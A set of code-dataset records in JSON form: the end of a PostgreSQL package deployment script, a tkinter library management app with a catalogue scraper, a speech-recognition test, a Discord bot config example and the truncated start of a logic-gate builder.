_old_schema_name)\n                cur.execute(_rename_schema_script)\n                # Add metadata to pgpm schema\n                cur.execute(SET_SEARCH_PATH.format(_variables.PGPM_SCHEMA_NAME))\n                cur.callproc('{0}._add_package_info'.format(_variables.PGPM_SCHEMA_NAME),\n                             [config_obj.name,\n                              config_obj.subclass,\n                              _old_schema_rev,\n                              config_obj.version.major,\n                              config_obj.version.minor,\n                              config_obj.version.patch,\n                              config_obj.version.pre,\n                              config_obj.version.metadata,\n                              config_obj.description,\n                              config_obj.license])\n                print(TermStyle.PREFIX_INFO + 'Schema {0} was renamed to {1}. 
Meta info was added to {2} schema'\n                      .format(schema_name, _old_schema_name, _variables.PGPM_SCHEMA_NAME))\n                create_db_schema(cur, schema_name, user_roles, owner_role)\n            else:\n                _drop_schema_script = \"DROP SCHEMA {0} CASCADE;\\n\".format(schema_name)\n                cur.execute(_drop_schema_script)\n                print(TermStyle.PREFIX_INFO + 'Dropping old schema {0}'.format(schema_name))\n                create_db_schema(cur, schema_name, user_roles, owner_role)\n\n        # Reordering and executing types\n        if types_files_count > 0:\n            if arguments['--file']:\n                print(TermStyle.PREFIX_ERROR +\n                      'Deploying types definition scripts in existing schema without dropping it first '\n                      'is not supported yet. Skipping')\n                sys.exit(1)\n            else:\n                type_ordered_scripts, type_unordered_scripts = reorder_types(types_script)\n                # uncomment for debug\n                # print(TermStyle.BOLD_ON + TermStyle.FONT_WHITE + '\\n'.join(type_ordered_scripts))\n                if type_ordered_scripts:\n                    cur.execute('\\n'.join(type_ordered_scripts))\n                if type_unordered_scripts:\n                    cur.execute('\\n'.join(type_unordered_scripts))\n                print(TermStyle.PREFIX_INFO + 'Types loaded to schema {0}'.format(schema_name))\n        else:\n            print(TermStyle.PREFIX_INFO + 'No type scripts to deploy')\n\n        # Executing functions\n        if functions_files_count > 0:\n            print(TermStyle.PREFIX_INFO + 'Running functions definitions scripts')\n            # print(TermStyle.HEADER + functions_script)\n            cur.execute(functions_script)\n            print(TermStyle.PREFIX_INFO + 'Functions loaded to schema {0}'.format(schema_name))\n        else:\n            print(TermStyle.PREFIX_INFO + 'No function scripts to deploy')\n\n        # Executing views\n        if views_files_count > 0:\n            print(TermStyle.PREFIX_INFO + 'Running views definitions scripts')\n            # print(TermStyle.HEADER + views_script)\n            cur.execute(views_script)\n            print(TermStyle.PREFIX_INFO + 'Views loaded to schema {0}'.format(schema_name))\n        else:\n            print(TermStyle.PREFIX_INFO + 'No view scripts to deploy')\n\n        # Executing tables\n        if tables_files_count > 0:\n            print(TermStyle.PREFIX_WARNING + 'Support for DDL or data updates is not implemented yet')\n        else:\n            print(TermStyle.PREFIX_INFO + 'No DDL or data update scripts to deploy')\n\n        # Executing triggers\n        if triggers_files_count > 0:\n            print(TermStyle.PREFIX_INFO + 'Running triggers definitions scripts')\n            # print(TermStyle.HEADER + triggers_script)\n            cur.execute(triggers_script)\n            print(TermStyle.PREFIX_INFO + 'Triggers loaded to schema {0}'.format(schema_name))\n        else:\n            print(TermStyle.PREFIX_INFO + 'No trigger scripts to deploy')\n\n        # Add metadata to pgpm schema\n        cur.execute(SET_SEARCH_PATH.format(_variables.PGPM_SCHEMA_NAME))\n        cur.callproc('{0}._add_package_info'.format(_variables.PGPM_SCHEMA_NAME),\n                     [config_obj.name,\n                      config_obj.subclass,\n                      None,\n                      config_obj.version.major,\n                      config_obj.version.minor,\n                      config_obj.version.patch,\n                      config_obj.version.pre,\n                      config_obj.version.metadata,\n                      config_obj.description,\n                      config_obj.license])\n        _after_deploy_script = pkgutil.get_data('pgpm', 'scripts/after_deploy.sql')\n        cur.execute(_after_deploy_script)\n        print(TermStyle.PREFIX_INFO + 'Meta info about deployment was added to schema {0}'.format(_variables.PGPM_SCHEMA_NAME))\n\n        # Commit transaction\n        conn.commit()\n\n        close_db_conn(cur, conn, arguments.get('<connection_string>'))\n\n    else:\n        print(arguments)\n\nif __name__ == '__main__':\n    main()\n","sub_path":"pgpm/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":22173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"435777314","text":"# -*- coding:utf-8 -*-\r\n'''\r\n    图书管理系统\r\n    
碎碎念见最下方\r\n 打包命令,切记要把exe放进csv在的文件夹...\r\n pyinstaller -F D:\\Kiwi\\Code\\Assignments\\library_management\\lib_manage.py --noconsole\r\n'''\r\nimport random\r\nimport string\r\nimport time\r\nimport requests\r\nimport csv\r\nimport re\r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\nfrom tkinter import messagebox\r\nfrom bs4 import BeautifulSoup\r\n\r\nfrom collections import Iterable\r\n\r\n# 好像明文储存有点过分不安全了...干脆不检测密码了\r\n# 优化要在完成之后!\r\nUSR_IMPORT_PATH = 'data\\datausr.csv'\r\nBOOK_IMPORT_PATH = 'data\\databook.csv'\r\nBOOK_STORAGE_PATH = 'data\\databook.csv'\r\nLOGIN_PWD = 'PWD'\r\nMAX_USR = 20\r\n# data_columns = ['书籍名称', '可借复本', '馆藏复本', '作者或译者', '地址'] # 好像没用上\r\n\r\nclass usr:\r\n def __init__(self, id, name):\r\n self.name = name\r\n self.id = id\r\n self.__pwd = LOGIN_PWD\r\n\r\nclass book:\r\n def __init__(self, name=None, id=None, avaliable=None, all=None, author=None, addr=None):\r\n self.nm = name\r\n self.id = id\r\n self.ava = avaliable\r\n self.all = all\r\n self.athr = author\r\n self.addr = addr\r\n self.hstry = []\r\n def dis(self):\r\n print('书籍名称:{0}\\n索书号:{1}\\n可借复本:{2}\\n馆藏复本:{3}\\n作者或译者:{4}\\n地址:{5}'\\\r\n .format(self.nm, self.id, self.ava, self.all, self.athr, self.addr))\r\n def opr(self, reader, opr):\r\n if opr =='lend':\r\n self.hstry.append('****操作:借出****用户名:%s****用户编号:%s****操作时间:%s'\\\r\n %(reader.nm, reader.id, time.ctime()))\r\n # print(self.hstry[-1])\r\n elif opr =='return':\r\n self.hstry.append('****操作:归还****用户名:%s****用户编号:%s****操作时间:%s'\\\r\n %(reader.nm, reader.id, time.ctime()))\r\n # print(self.hstry[-1])\r\n else : print('图书操作失败!')\r\n def prnt_hstry(self):\r\n if len(self.hstry) == 0:\r\n print('暂无借阅记录')\r\n else:\r\n print('\\n'.join(self.hstry))\r\n\r\nclass rd(usr):\r\n def __init__(self, id, name, *history):\r\n super().__init__(id, name)\r\n self.id = id\r\n self.type = 'Reader'\r\n self.b_book = []\r\n if history:\r\n # self.hstry = [{'name': 'test', 'opr': 'test', 'time': 'test'}]\r\n self.hstry = []\r\n # class opr_history():\r\n # def __init__(self, name, operate, time):\r\n # self.name = name\r\n # self.operate = operate\r\n # self.time = time\r\n\r\n def opr(self, book, opr):\r\n # book.opr(self, opr)\r\n # print('from usr class', self.hstry)\r\n\r\n if opr =='lend':\r\n # self.hstry.append(self.opr_history(book.nm, 'lend', time.time()))\r\n self.b_book.append(book.nm)\r\n # self.hstry.append({'name': book.nm, 'opr': 'lend', 'time': time.time()})\r\n self.hstry.append('****借入%s 编号:%s 操作时间:%s'%(book.nm, book.id, time.ctime()))\r\n\r\n elif opr =='return':\r\n # self.hstry.append(self.opr_history(book.nm, 'return', time.time()))\r\n self.b_book.remove(book.nm)\r\n # self.hstry.append({'name': book.nm, 'opr': 'return', 'time': time.time()})\r\n self.hstry.append('****归还%s 编号:%s 操作时间:%s' % (book.nm, book.id, time.ctime()))\r\n\r\n else:\r\n print('用户操作失败!')\r\n # def prnt_hstry(self):\r\n # if len(self.hstry)==0:\r\n # print('暂无借阅记录')\r\n # else:\r\n # print('\\n'.join(self.hstry))\r\n\r\nclass admin(usr):\r\n def __init__(self, id, name):\r\n super().__init__(id, name)\r\n self.type = 'Admin'\r\n # self.hstry = history\r\n\r\n def import_data(self, path):\r\n with open(path) as data_file:\r\n reader = csv.reader(data_file)\r\n data_cache = []\r\n for each_line in reader:\r\n if len(each_line) == 0:\r\n continue\r\n else:\r\n data_cache.append(each_line)\r\n # print(each_line)\r\n return data_cache\r\n\r\n # def add_book(self, book_name, no=None, valid='1', all='1', author=None, addr=None):\r\n # lib.lib_add_bk(book_name, no, valid, all, 
author, addr)\r\n # def edit_book(self, book_name, target, new_value):\r\n # lib.lib_edit_bk(book_name, target, new_value)\r\n # def del_book(self, book):\r\n # pass\r\n\r\nclass login_page:\r\n def __init__(self):\r\n self.login = tk.Tk()\r\n self.login.title('登陆窗口')\r\n self.login.geometry('300x420')\r\n self.text = tk.Label(text='欢迎登陆\\n用户图书管理系统', font=('Arial', 24))\\\r\n .pack(pady=20)\r\n self.name = tk.Label(text='用户名:').place(x=50, y=180)\r\n self.usr_name = tk.Entry()\r\n self.usr_name.place(x=100, y=180)\r\n self.name = tk.Label(text='密码:').place(x=50, y=240)\r\n self.usr_pwd = tk.Entry()\r\n self.usr_pwd.place(x=100, y=240)\r\n self.submit = tk.Button(text='登陆', command=lambda: self.usr_login(), width=10)\\\r\n .place(x=50, y=300)\r\n self.exit = tk.Button(text='退出', command=lambda: self.usr_exit(), width=10)\\\r\n .place(x=170, y=300)\r\n self.login.mainloop()\r\n\r\n def usr_login(self):\r\n self.name = self.usr_name.get()\r\n self.pwd = self.usr_pwd.get()\r\n with open(USR_IMPORT_PATH, 'r', newline='') as user_list:\r\n reader = csv.reader(user_list)\r\n check_flag = False\r\n for each_line in reader:\r\n if self.name == each_line[1]:\r\n check_flag = True\r\n if each_line[2] == 'admin':\r\n # 'user id', 'user name', 'history'\r\n self.a_admin = admin(each_line[0], each_line[1])\r\n self.a_admin_page = admin_page(usr_class=self.a_admin, parent=self.login, usr_name='admin')\r\n break\r\n elif each_line[2] == 'reader':\r\n self.a_rd = rd(each_line[0], each_line[1], each_line[3])\r\n self.a_rd_page = rd_page(self.a_rd, self.login, 'reader_1')\r\n break\r\n if not check_flag:\r\n messagebox.showwarning(title='警告', message='登陆失败! 请检查用户名')\r\n\r\n def usr_exit(self):\r\n self.login.destroy()\r\n\r\nclass main_page:\r\n def __init__(self, usr_class, parent=None, usr_name='null'):\r\n if parent is not None:\r\n parent.destroy()\r\n self.usr_class = usr_class\r\n self.usr_name = usr_name\r\n self.main = tk.Tk()\r\n self.main.title('用户图书管理系统')\r\n # 划分主要区域\r\n self.left_top_frm = tk.Frame(width=200, height=300)\r\n self.left_top_frm.grid(row=0, column=0, sticky='NW', padx=20, pady=10)\r\n self.left_down_frm = tk.Frame(width=200, height=300)\r\n self.left_down_frm.grid(row=1, column=0, sticky='NW', padx=40, pady=10)\r\n self.right_frm = tk.Frame(width=600, height=600)\r\n self.right_frm.grid(row=0, column=1, rowspan=2, sticky='NW', padx=20, pady=10)\r\n # 左上的部件\r\n self.welc_msg = tk.Label(self.left_top_frm, text=\"欢迎回来!\", font=('Verdana', 12))\\\r\n .grid(row=0, column=1, ipady=5, sticky='w')\r\n self.time = tk.Label(self.left_top_frm, text=time.strftime('%y-%m-%d %I:%M:%S %p'), font=('Verdana', 12))\r\n self.time.grid(row=1, column=1, ipady=5, sticky='w')\r\n self.usr_info = tk.Label(self.left_top_frm, text=\"用户ID: %s\" % self.usr_class.id, font=('Verdana', 12))\\\r\n .grid(row=2, column=1, ipady=5, sticky='w')\r\n self.usr_name = tk.Label(self.left_top_frm, text=\"用户名:%s\" % self.usr_name, font=('Verdana', 12))\\\r\n .grid(row=3, column=1, ipady=5, sticky='w')\r\n self.usr_type = tk.Label(self.left_top_frm, text=\"用户类型:管理员\", font=('Verdana', 12))\r\n self.usr_type.grid(row=4, column=1, ipady=5, sticky='w')\r\n # 左下角部件\r\n self.find = tk.Entry(self.left_down_frm, width=20, fg='gray')\r\n self.find.insert(index=0, string='请输入查找内容')\r\n self.find.bind('', func=self.find_book)\r\n self.find.bind('', func=self.dis_res)\r\n self.find.grid(row=0, column=1, pady=5)\r\n self.b1 = tk.Button(self.left_down_frm, text='', width=20, command=None)\r\n self.b1.grid(row=1, column=1, pady=5)\r\n 
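       # b1 to b4 are created blank on purpose: the rd_page and admin_page subclasses\r\n        # fill in their text and command callbacks via .configure() in their own\r\n        # __init__ methods, e.g. (hypothetical action name):\r\n        #     self.b1.configure(text='...', command=lambda: self.some_action())\r\n        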
self.b2 = tk.Button(self.left_down_frm, text='', width=20, command=None)\r\n self.b2.grid(row=2, column=1, pady=5)\r\n self.b3 = tk.Button(self.left_down_frm, text='', width=20, command=None)\r\n self.b3.grid(row=3, column=1, pady=5)\r\n self.b4 = tk.Button(self.left_down_frm, text='', width=20, command=None)\r\n self.b4.grid(row=4, column=1, pady=5)\r\n self.exit = tk.Button(self.left_down_frm, text='退出', width=20, command=lambda: self.usr_exit(self.usr_class))\r\n self.exit.grid(row=5, column=1, pady=5)\r\n # 右侧的treeview\r\n self.columns = ('书籍名称', '索书号', '可借复本', '馆藏复本', '作者或译者', '地址')\r\n self.book_list = ttk.Treeview(self.right_frm, show='headings', height=20, columns=self.columns)\r\n # self.book_list.bind('', self.find_book)\r\n self.scroll = ttk.Scrollbar(self.right_frm, orient='vertical', command=self.book_list.yview)\r\n self.book_list.configure(yscrollcommand=self.scroll.set)\r\n # 这里只是用来设定宽度\r\n self.book_list.column('书籍名称', width=120, anchor='center')\r\n self.book_list.column('索书号', width=100, anchor='center')\r\n self.book_list.column('可借复本', width=50, anchor='center')\r\n self.book_list.column('馆藏复本', width=50, anchor='center')\r\n self.book_list.column('作者或译者', width=150, anchor='center')\r\n self.book_list.column('地址', width=200, anchor='center')\r\n self.book_list.grid(row=0, column=0, sticky='NSEW')\r\n self.scroll.grid(row=0, column=1, sticky='NS')\r\n # 绑定headings\r\n for i in self.columns:\r\n self.book_list.heading(i, text=i)\r\n # self.main.bind('', func=self.dis_res)\r\n self.update_time()\r\n\r\n def update_time(self):\r\n self.time.configure(text=time.strftime('%y-%m-%d %I:%M:%S %p'))\r\n self.time.after(ms=1000, func=self.update_time)\r\n\r\n def find_book(self, event):\r\n self.find.delete(0, len(self.find.get()))\r\n self.find.configure(fg='black')\r\n self.find.bind('', func=self.dis_res)\r\n\r\n def dis_res(self, event):\r\n # 没找到暂时没有提醒\r\n self.target = self.find.get()\r\n # print(self.book_list.selection())\r\n for each_selected in self.book_list.selection():\r\n self.book_list.selection_remove(each_selected)\r\n for each_col in self.book_list.get_children():\r\n for each_cell in self.book_list.item(each_col, 'values'):\r\n if self.target is not '' and self.target in each_cell:\r\n self.book_list.selection_add((each_col))\r\n self.book_list.move(each_col, '', 0)\r\n\r\n\r\n\r\n # def find_pop(self, event):\r\n # try:\r\n # self.find_entry\r\n # except NameError:\r\n # print('test')\r\n # else:\r\n # self.find_entry.destroy()\r\n # finally:\r\n # self.row = self.book_list.identify_row(event.y)\r\n # self.col = self.book_list.identify_column(event.x)\r\n # x, y, width, height = self.book_list.bbox(self.row, self.col)\r\n # print(self.row, self.col)\r\n # print(self.book_list.bbox(self.row, self.col))\r\n # self.find_entry = tk.Entry(self.book_list, '', width=width//4)\r\n # self.find_entry.place(x=x, y=y)\r\n # print(self.book_list.heading(column=self.col)['text'])\r\n # if self.book_list.identify_region(x=event.x, y=event.y) == 'heading':\r\n # pass\r\n # print(self.book_list.identify_region(x=event.x, y=event.y))\r\n\r\n def usr_exit(self, usr_class):\r\n\r\n with open(BOOK_STORAGE_PATH, 'w', newline='') as csvfile:\r\n print('saving books...')\r\n writer = csv.writer(csvfile)\r\n for each_line in self.book_list.get_children():\r\n writer.writerow(self.book_list.item(each_line, 'values'))\r\n with open(USR_IMPORT_PATH, 'a', newline='') as csvfile:\r\n print('saving users...')\r\n writer = csv.writer(csvfile)\r\n print(usr_class.type)\r\n if 
usr_class.type=='Reader':\r\n print(usr_class.id, usr_class.name, usr_class.type,\\\r\n ''.join(usr_class.b_book), ''.join(usr_class.hstry))\r\n writer.writerow([usr_class.id, usr_class.name, usr_class.type,\\\r\n ''.join(usr_class.hstry), ''.join(usr_class.b_book),])\r\n elif usr_class.type == 'Admin':\r\n writer.writerow([usr_class.id, usr_class.name, usr_class.type])\r\n self.main.destroy()\r\n login_again = login_page()\r\n login_again.login.mainloop()\r\n\r\n\r\nclass rd_page(main_page):\r\n def __init__(self, usr_class, parent=None, usr_name='null'):\r\n super().__init__(usr_class, parent, usr_name)\r\n # self.main.title('图书借阅管理系统') 切换title?\r\n self.usr_class = usr_class\r\n self.usr_type.configure(text=\"用户类型:读者\")\r\n self.b1.configure(text='借入', command=lambda: self.borr_book(self.usr_class,\\\r\n globals()['book_'+ str(self.book_list.index(self.book_list.selection()))]))\r\n self.b2.configure(text='归还', command=lambda: self.rtrn_book(self.usr_class,\\\r\n globals()['book_'+ str(self.book_list.index(self.book_list.selection()))]))\r\n self.b3.configure(text='已借书籍', command=lambda: self.dis_list(usr_class))\r\n self.b4.configure(text='借阅记录', command=lambda: self.dis_hstry(usr_class))\r\n\r\n with open(BOOK_STORAGE_PATH) as data_file:\r\n reader = csv.reader(data_file)\r\n i=0\r\n for each_line in reader:\r\n if len(each_line) == 0:\r\n continue\r\n else:\r\n globals()['book_'+ str(i)] = book(each_line[0], each_line[1], each_line[2],\\\r\n each_line[3],each_line[4], each_line[5])\r\n # '书籍名称:{0}\\n索书号:{1}\\n可借复本:{2}\\n馆藏复本:{3}\\n作者或译者:{4}\\n地址:{5}'\r\n i+=1\r\n self.book_list.insert('', 'end', values=each_line)\r\n self.update_time()\r\n self.main.mainloop()\r\n\r\n def borr_book(self, usr_class, book):\r\n if int(book.ava) > 0:\r\n book.ava = int(book.ava) - 1\r\n self.book_list.set(self.book_list.selection(), 2, book.ava)\r\n usr_class.opr(book, 'lend')\r\n print(usr_class.hstry)\r\n # messagebox.showinfo(message='借书成功!')\r\n else:\r\n messagebox.showwarning(message='书籍可借数量不足!')\r\n # self.ava = int(book.ava)\r\n # if self.ava > 0:\r\n # self.ava -= 1\r\n # self.book_list.set(self.book_list.selection(), 2, self.ava)\r\n # usr_class.opr(book, 'lend')\r\n # print(len(usr_class.hstry), usr_class.hstry[-1].name, 'lend', usr_class.hstry[-1].time)\r\n # messagebox.showinfo(message='借书成功!')\r\n # else:\r\n # messagebox.showwarning(title='警告', message='剩余书籍数量不足!')\r\n def rtrn_book(self, usr_class, book):\r\n if book.nm in usr_class.b_book:\r\n book.ava = int(book.ava) + 1\r\n self.book_list.set(self.book_list.selection(), 2, book.ava)\r\n usr_class.opr(book, 'return')\r\n print(usr_class.hstry[1:])\r\n else:\r\n messagebox.showinfo(message='未查询到借阅记录')\r\n\r\n def dis_list(self, usr_class):\r\n if len(usr_class.b_book) == 0:\r\n messagebox.showinfo(message='还没有借书哦')\r\n else:\r\n messagebox.showinfo(message='您的已借阅书籍为\\n %s'%'\\n '.join(usr_class.b_book))\r\n def dis_hstry(self, usr_class):\r\n if len(usr_class.b_book) == 0:\r\n messagebox.showinfo(message='未查询到借阅记录')\r\n else:\r\n messagebox.showinfo(message='您的已借阅记录为\\n%s' % '\\n'.join(usr_class.hstry))\r\n\r\n# def __init__(self, parent, usr_name='null'):\r\n# parent.destroy()\r\n# self.usr_name = usr_name\r\n# self.main = tk.Tk()\r\n# self.main.title('用户图书管理系统')\r\n# self.main.geometry('800x600')\r\n# self.clock = tk.Label(font=('Arial', 16), text='时间:%s' % time.ctime(), bg='#F8F8FF').place(x=450, y=10)\r\n# self.usr_info = tk.Label(font=('Arial', 16), text='用户名: %s\\n 用户权限:%s'%(self.usr_name, self.usr_type),\\\r\n# 
bg='#F8F8FF').place(x=50, y=30)\r\n# self.book_dis = tk.Button(text='查看', font=('Arial', 16), width=12, \\\r\n# command=lambda: self.book_dis).place(x=50, y=100)\r\n# self.book_edit = tk.Button(text='编辑', font=('Arial', 16), width=12, \\\r\n# command=lambda: self.book_dis).place(x=50, y=160)\r\n# self.book_add = tk.Button(text='添加', font=('Arial', 16), width=12, \\\r\n# command=lambda: self.book_dis).place(x=50, y=220)\r\n# self.book_del = tk.Button(text='删除', font=('Arial', 16), width=12, \\\r\n# command=lambda: self.book_dis).place(x=50, y=280)\r\n# self.main.mainloop()\r\n# def book_dis(self):\r\n# pass\r\nclass admin_page(main_page):\r\n def __init__(self, usr_class, parent=None, usr_name='null'):\r\n super().__init__(usr_class, parent, usr_name)\r\n\r\n self.b1.configure(text='导入', command=lambda: self.import_data())\r\n self.b2.configure(text='添加', command=lambda: self.add_book())\r\n self.b3.configure(text='删除', command=lambda: self.del_book())\r\n self.b4.configure(text='编辑', command=lambda: self.edit_book())\r\n self.main.mainloop()\r\n\r\n # GUI的函数全部只做按钮,以及管理员类的函数对接,不做文件操作\r\n # 这里有点问题就是点完确定主界面不会刷新, 叉掉才会刷新\r\n def add_book(self):\r\n # 在关闭窗口后才会刷新...\r\n add_page = book_details('书籍详情添加')\r\n self.main.wait_window(add_page.details)\r\n self.book_list.insert('', 'end', values=(add_page.book_info))\r\n\r\n def edit_book(self):\r\n edit_page = book_details('书籍详情编辑')\r\n self.main.wait_window(edit_page.details)\r\n count = 0\r\n for value in edit_page.book_info:\r\n if value != '':\r\n self.book_list.set(self.book_list.selection(), count, value)\r\n count += 1\r\n\r\n def del_book(self):\r\n self.book_list.delete(self.book_list.selection())\r\n # print(self.book_list.index(self.book_list.selection()))\r\n\r\n def import_data(self):\r\n # 没有加入数据的补全\r\n for each_line in self.usr_class.import_data(BOOK_IMPORT_PATH):\r\n self.book_list.insert('', 'end', values=each_line)\r\n\r\nclass book_details():\r\n def __init__(self, title):\r\n self.details = tk.Toplevel()\r\n self.details.title(title) #根据改查不同\r\n # self.details.geometry('400x300')\r\n\r\n self.msg = tk.Label(self.details, text='').grid(row=0)\r\n self.name_ = tk.Label(self.details, text='书籍名称:').grid(row=1, column=0, padx=20, pady=5)\r\n self.name = tk.Entry(self.details)\r\n self.name.grid(row=1, column=1, padx=20)\r\n self.id_ = tk.Label(self.details, text='索书号:').grid(row=2, column=0, pady=5)\r\n self.id = tk.Entry(self.details)\r\n self.id.grid(row=2, column=1)\r\n self.ava_ = tk.Label(self.details, text='可借复本:').grid(row=3, column=0, pady=5)\r\n self.ava = tk.Entry(self.details)\r\n self.ava.grid(row=3, column=1)\r\n self.all_ = tk.Label(self.details, text='馆藏复本:').grid(row=4, column=0, pady=5)\r\n self.all = tk.Entry(self.details)\r\n self.all.grid(row=4, column=1)\r\n self.ath_ = tk.Label(self.details, text='作者/译者:').grid(row=5, column=0, pady=5)\r\n self.ath = tk.Entry(self.details)\r\n self.ath.grid(row=5, column=1)\r\n self.addr_ = tk.Label(self.details, text='所在地址:').grid(row=6, column=0, pady=5)\r\n self.addr = tk.Entry(self.details)\r\n self.addr.grid(row=6, column=1)\r\n\r\n self.submit = tk.Button(self.details, text='确认', command = lambda: self.edit_submit())\r\n self.submit.grid(row=7, column=0, sticky='e', pady=20)\r\n self.cancel = tk.Button(self.details, text='取消', command=lambda: self.back())\r\n self.cancel.grid(row=7, column=1, pady=20)\r\n # self.submit = tk.Button(self.details, text='确认', command=lambda: self.edit_submit())\r\n # self.submit.grid(row=7, column=0, sticky='e', pady=20)\r\n # self.cancel = 
tk.Button(self.details, text='取消', command=lambda: self.back())\r\n # self.cancel.grid(row=7, column=1, pady=20)\r\n\r\n # self.hsty = tk.Label(self.details, text='这里是借阅历史')\r\n # self.hsty.grid(row=0, column=2, padx=20, pady=5)\r\n # self.details.mainloop()\r\n\r\n def edit_submit(self):\r\n self.book_info = []\r\n self.book_info = [self.name.get(), self.id.get(), self.ava.get(),\\\r\n self.all.get(), self.ath.get(), self.addr.get()]\r\n if len(self.book_info) == 0:\r\n messagebox.showwarning(title='警告', message='请输入要修改的内容')\r\n self.details.destroy()\r\n # 这里不知道为啥蹦不出来?\r\n\r\n def back(self):\r\n self.details.destroy()\r\n # new_main = admin_page()\r\n pass\r\n\r\ndef init_test_usr():\r\n print('Initializing some test users...')\r\n with open(USR_IMPORT_PATH, 'w', newline='') as csvfile:\r\n writer = csv.writer(csvfile)\r\n print('start writing...')\r\n writer.writerow(['user id', 'user name', 'user type', 'history'])\r\n writer.writerow(['0', 'admin', 'admin', 'NULL'])\r\n writer.writerow(['1', 'reader', 'reader', '1'])\r\n for i in range(MAX_USR):\r\n type = random.choice(['admin', 'reader'])\r\n writer.writerow([''.join(random.sample(string.digits, 3)),\\\r\n type+'_'+''.join(random.sample(string.ascii_letters, 3)),\\\r\n type, ''])\r\n print('Completed')\r\n\r\ndef go_get_some_books():\r\n print('finding the book details...')\r\n headers = {\r\n # 获取自浏览器开发工具network页签,请求详情中的resuest headers里\r\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 \\\r\n (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'\r\n }\r\n url = 'http://lib.ecust.edu.cn/books/advquery?type=%E7%BA%B8%E8%B4%A8&title=%E5%9B%BE%E4%B9%A6&author=&publish=&isbn=&callNo=&form_build_id=form-mdM6uT9s9O3wqxWNkPyKAP0WzKLU4g_omjvqw--FIdM&form_id=ecust_lib_form_book_adv_query&op=%E6%90%9C%E7%B4%A2'\r\n res = requests.get(url, headers=headers)\r\n # res.encoding = 'utf-8'\r\n soup = BeautifulSoup(res.text, 'html.parser')\r\n tlist = soup.find_all(class_='title')\r\n athr_list = soup.find_all(class_='author')\r\n addr_list = soup.find_all(class_='addr')\r\n with open(BOOK_IMPORT_PATH, 'w') as csvfile:\r\n writer = csv.writer(csvfile)\r\n print('start writing...')\r\n writer.writerow(['书籍名称', '索书号', '可借复本', '馆藏复本','作者或译者', '地址'])\r\n for i in range(len(tlist)):\r\n writer.writerow([tlist[i].text.split()[0], tlist[i].text.split()[-1],\\\r\n athr_list[i].text.split()[1], athr_list[i].text.split()[3],\\\r\n athr_list[i].text.split()[5], addr_list[i].text.split()[-1]])\r\n # print(tlist[i].text.split())\r\n # print(athr_list[i].text.split())\r\n # print(addr_list[i].text.split())\r\n print('Complete')\r\n\r\nif __name__ == '__main__':\r\n # init_test_usr()\r\n # 第一测试层级\r\n login_1st = login_page()\r\n # 第二测试层级\r\n # admin_test = admin('3', 'test')\r\n # admin_page = admin_page(admin_test, usr_name='admin')\r\n # admin_page.main.mainloop()\r\n\r\n # rd_test = rd(23, 'test', '')\r\n # rd_page = rd_page(rd_test, usr_name='reader')\r\n # rd_page.main.mainloop()\r\n\r\n # 第三测试层级\r\n # test = book_details('test')\r\n #\r\n\r\n'''\r\n20-3-28 更新\r\n目标\r\n 可借数量不得大于总共 用户登录检查 搜索实时刷新 可借数量还有些微妙的bug\r\n20-3-27 更新\r\n基本完成GUI界面,放弃多文件编译\r\n目前实现功能\r\n 登陆界面-> 读者/管理员界面\r\n 读者界面-> 借入 归还 查看已借 查看借阅记录 退出(->登陆)\r\n 管理员界面-> 导入 添加/编辑(->图书详情) 删除 退出(->登陆)\r\n目标\r\n 加入图书被借阅记录, 没确定位置\r\n 加入查找功能,\r\n\r\n20-3-21 更新\r\n 基本画好GUI, 用了treeview控件可以绑定鼠标事件\r\n 写了三个文件一堆堆函数和类,但是完全结合不起来的样子, mysql也很麻烦还是用csv吧\r\n\r\n20-3-16 画饼\r\n 总之写了很多类, 但是互相还没什么关系\r\n 用csv和pandas的库操作了下数据, pandas不大适合这种类型\r\n\r\n usr class def & all things\r\n # 基类:\r\n # 
用户类:具有用户名、密码、用户编号等属性;\r\n # 具有登陆、查看主界面、查看图书详情等功能;\r\n # 图书类:具有名称、索书号、作者等属性;\r\n # 派生类:\r\n # 用户类派生类有管理员类、用户类,用户编号区间不同,\r\n # 衍生功能有管理员对图书的增删改查,用户对图书的借还功能;\r\n # 图书类派生有一些具体类别,主要衍生了一个类别属性。\r\n'''\r\n\r\n\r\n\r\n\r\n","sub_path":"lib_manage.py","file_name":"lib_manage.py","file_ext":"py","file_size_in_byte":26563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"483173272","text":"import speech_recognition as sr\n\nr = sr.Recognizer()\n\nwith sr.Microphone() as source:\n r.adjust_for_ambient_noise(source)\n print(\"Say something\")\n audio = r.listen(source)\n\ntry:\n print(\"You said: \" + r.recognize_sphinx(audio))\nexcept sr.UnknownValueError:\n print(\"Could not understand\")\nexcept sr.RequestError as e:\n print(\"Error; {0}\".format(e))","sub_path":"test_scripts/test_speach.py","file_name":"test_speach.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"23109396","text":"import logging\n\n# -- Rename this file to config.py! --\n\n# Enter discord token from https://discordapp.com/developers/applications/me/\ntoken='yoursupersecrettoken'\n# color of the embed\ncolor = 0x859900\n# keywords to trigger the bot in passive channels\nkeywords = ['!pob']\n# reacts to pastebin posts with pob info in these channels\nactive_channels = ['pob']\n# debug level\ndebug_level = logging.INFO\n\npresence_message = '!pob '","sub_path":"config.example.py","file_name":"config.example.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"61805758","text":"import sys\nimport json\nimport os\nimport io\nimport re\nfrom logicUtils import parseFunctions\n\ndef buildGate(sLogic, n=0, gateI=0):\n g = ''\n be = ''\n c = ''\n w = ''\n gn = ''\n gi = gateI\n s = ''\n i = n\n rg = []\n bes = []\n while True:\n c = sLogic[i:i+1]\n if (c == '('):\n # recurse to new gate\n ts, ti, tg, tTop, trg, tbes = buildGate(sLogic, i+1, gi)\n rg.append(ts)\n for og in trg:\n rg.append(og)\n for ob in tbes:\n bes.append(ob)\n gi = tg\n gn = 'G' + str(tTop)\n #advance to i\n i = ti\n elif (c == ')'):\n # return to parent\n be = w\n bes.append(be)\n if (gn == ''):\n s = s + '\\n'\n else:\n s = s + '\\n'\n gn = ''\n s = s + '\\n'\n s = s + 